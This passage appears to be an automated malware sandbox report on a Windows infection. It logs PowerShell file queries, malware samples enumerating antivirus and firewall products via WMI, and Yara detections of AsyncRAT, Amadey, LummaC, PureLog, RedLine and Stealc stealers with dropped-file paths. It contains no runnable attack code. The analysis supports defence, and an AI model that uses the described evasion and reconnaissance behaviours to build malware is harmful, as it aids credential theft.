Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\1072546001\487dac876e.exe

Code function: 9_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

9_2_00406831

Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Yara detected AsyncRAT

Source: Yara match	File source: 22.3.Macromedia.com.36a8750.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.3.Macromedia.com.36a8750.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.3.Macromedia.com.36a8750.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.3.Macromedia.com.36a8750.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000016.00000003.2949566723.00000000036A8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000003.3043051709.0000000000E25000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000003.2949566723.0000000003639000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000003.2950687413.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000003.3028948507.00000000036A8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000003.2951079178.0000000000E2C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000003.3028948507.00000000036C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000003.3043160239.000000000360B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000003.3028948507.00000000036B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Macromedia.com PID: 3300, type: MEMORYSTR

Source: dfd80aba08.exe, 00000023.00000003.2904862681.00000000058FE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: s Defender\MsMpeng.exe
Source: dfd80aba08.exe, 00000007.00000003.2364951051.0000000005C71000.00000004.00000800.00020000.00000000.sdmp, e2b0a87ceb.exe, 00000017.00000002.2610627222.0000000001592000.00000004.00000020.00020000.00000000.sdmp, dfd80aba08.exe, 00000023.00000003.2852645964.0000000001154000.00000004.00000020.00020000.00000000.sdmp, dfd80aba08.exe, 00000023.00000003.2845601094.00000000011D1000.00000004.00000020.00020000.00000000.sdmp, dfd80aba08.exe, 00000023.00000003.2868264245.00000000011D1000.00000004.00000020.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.3101072477.0000000000C88000.00000004.00000020.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.3097199131.000000000546E000.00000004.00000800.00020000.00000000.sdmp, 7fOMOTQ.exe, 0000002C.00000003.3101072477.0000000000C7B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1072554001\dDFw6mJ.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1072554001\dDFw6mJ.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

Stealing of Sensitive Information

Yara detected Amadey

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 0.2.random.exe.650000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.skotes.exe.ac0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 41.2.FQZHGI4TELUEK712J739LWFDT7.exe.b60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.skotes.exe.ac0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1755461753.0000000000651000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1778240987.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1791230445.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000002.2681093884.0000000000B61000.00000040.00000001.01000000.00000018.sdmp, type: MEMORY

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: dfd80aba08.exe PID: 3164, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dfd80aba08.exe PID: 5888, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 7fOMOTQ.exe PID: 1196, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 21.2.e2b0a87ceb.exe.3ef9550.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.0.e2b0a87ceb.exe.ba0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.e2b0a87ceb.exe.3ef9550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000015.00000002.2611358167.0000000003EF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000000.2384664096.0000000000BA2000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1072561001\c6de8b12c0.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[3].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1072568001\88823343d6.exe, type: DROPPED

Yara detected RedLine Stealer

Source: Yara match	File source: 00000024.00000003.2579845134.00000000050E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loqVSeJ.exe PID: 2692, type: MEMORYSTR

Yara detected Stealc

